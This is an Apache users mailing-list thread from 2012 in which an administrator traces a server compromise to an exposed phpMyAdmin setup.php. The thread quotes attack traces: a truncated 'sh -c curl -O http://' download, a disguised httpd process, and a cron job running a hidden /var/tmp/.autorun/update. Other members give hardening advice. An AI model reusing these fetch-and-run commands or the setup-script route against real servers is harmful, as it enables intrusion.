[users@httpd] attack on apache - solved -
Thanks a lot to everyone who help me to solve the problem. I had installed phpmyadmin and they used it to attack my server. I found this in /var/log/httpd/access_log Cheers Luisa
RE: [users@httpd] attack on apache - solved -
Date: Fri, 13 Jan 2012 15:32:55 -0500 To: users@httpd.apache.org From: storm...@stormy.ca Subject: Re: [users@httpd] attack on apache - solved - At 04:48 PM 1/13/2012 -0300, you wrote: Thanks a lot to everyone who help me to solve the problem. I had installed phpmyadmin and they used it to attack my server. I found this in /var/log/httpd/access_log Was your compile of apache2 prefork or worker? And could you be a little more explicit with what you found in your logs (without compromising security?) I'm interested because I have a worker compile of 2.2.17 that I will shortly be changing either to FastCGI or prefork, because of php that requires libapache2-mod-php5, which in turn depends on apache2-mpm-prefork ( 2.0.52) and apache2-mpm-itk. tnx - paul My apache is compiled with prefork. My phpmyadmin must be used only from my internal network with user and passwd (I thought this ). When I was looking at my access_log I saw that it was being used from and external ip. The messages in my logfile is: xx.xxx.xx.xx GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1 200 14049 - Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] xx.xxx.xxx.xx POST /admin/phpmyadmin/scripts/setup.php HTTP/1.1 200 - http://xxx.xx.xx.xx/admin/phpmyadmin/scripts/setup.php\r; Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] Now I just remove some permissions until I find a real solution . I am using Centos 5.7. Cheers Luisa - The official User-To-User support forum of the Apache HTTP Server Project. See URL:http://httpd.apache.org/userslist.html for more info. To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org from the digest: users-digest-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
RE: [users@httpd] attack on apache
From: luisa2...@hotmail.com To: users@httpd.apache.org Subject: RE: [users@httpd] attack on apache Date: Wed, 11 Jan 2012 16:15:14 -0300 Date: Mon, 9 Jan 2012 17:30:21 + From: tevans...@googlemail.com To: users@httpd.apache.org Subject: Re: FW: [users@httpd] attack on apache On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro luisa2...@hotmail.com wrote: I didn´t have any cronjobs but when I detected the attack I saw one in /var/spool/cron My logifle says User apache: /var/tmp/.autorun/update /dev/null 21: 2162 Time(s) personal crontab deleted: 56 Time(s) personal crontab listed: 1 Time(s) personal crontab replaced: 1 Time(s) Thanks Google tells me that this is output from a cpanel perl script - probably a crontab editor. crontabs are not evidence of an attack. You need to show more details of what you think is happening, and why you think it is malicious. Cheers Tom I think it is an attack because I found this commands running on my server (with owner apache) /usr/local/apache/bin/httpd - DSFSL sh -c curl -O http:// I also found a folder proc in /var/named/chroot. this folder is the same as /proc, is updated with the original /proc and I can't delete. In /var/log/httpd/error_log I see hink like this sh: del comand no found sh: xx Permission denied I need help ! Thanks Luisa
RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 21:13:53 +0100 From: jer...@adaptr.nl To: users@httpd.apache.org Subject: Re: [users@httpd] attack on apache On 01/11/2012 09:10 PM, Jaco Kroon wrote: On 11/01/12 21:35, Jeroen Geilman wrote: In /var/log/httpd/error_log I see hink like this sh: del comand no found sh: xx Permission denied I need help ! 1. Stop apache. 2. investigate which leaky, creaky or lousy PHP script allowed this exploit. 3. remove the bad script. 4. Remount /tmp with noexec,nosuid,nodev to prevent the majority of these types of exploits. Surely you noticed that I did not advise him to turn it back on - at all ? ;) But yes, distros that don't protect /tmp suck. -- J. Thanks Jeron: any idea how to start researching which is the leaky script Cheers Luisa
[users@httpd] can not send
you reject my messages
Re: [users@httpd] can not send
Thanks Rambo I am trying to send a messages with the descrption of my problem, and always is reject (for spam or somethig like this), for this reason I send a short messages. It is my first contact with the list. I used copy and paste to send a part of muy log files . Is this the problem ? or are there another thing that I dont know Thank again 2012/1/9 Marcin 'Rambo' Roguski ra...@id.uw.edu.pl On Mon, 9 Jan 2012 09:13:09 -0300 Luisa Ester Navarro luisaester2...@gmail.com wrote: you reject my messages Apparently not -- Marcin 'Rambo' Roguski ra...@id.uw.edu.pl - The official User-To-User support forum of the Apache HTTP Server Project. See URL:http://httpd.apache.org/userslist.html for more info. To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org from the digest: users-digest-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
[users@httpd] attack on apache
My server is being attacked. I think it is from apache because I have found commands running with the owner apache. My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL and sh -c curl -o http They also run every minutes a crontab from /var/spool/cron and I din´t have anyone there. I am using Centos 5.7 and httpd-2.2.3.53-el5.centos.3 and my system is update. Can someone help me? Thanks in advance Luisa
FW: [users@httpd] attack on apache
I didn´t have any cronjobs but when I detected the attack I saw one in /var/spool/cron My logifle says User apache: /var/tmp/.autorun/update /dev/null 21: 2162 Time(s) personal crontab deleted: 56 Time(s) personal crontab listed: 1 Time(s) personal crontab replaced: 1 Time(s)Thanks Date: Mon, 9 Jan 2012 18:05:38 +0100 From: i...@simonecaruso.com To: users@httpd.apache.org CC: luisa2...@hotmail.com Subject: Re: [users@httpd] attack on apache On 09/01/2012 16:11, Luisa Ester Navarro wrote: My server is being attacked. I think it is from apache because I have found commands running with the owner apache. My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL and sh -c curl -o http I don't think they exploited apache, maybe an application level bug. Are the cronjobs running as the apache user? -- Simone Caruso IT Consultant +39 349 65 90 805
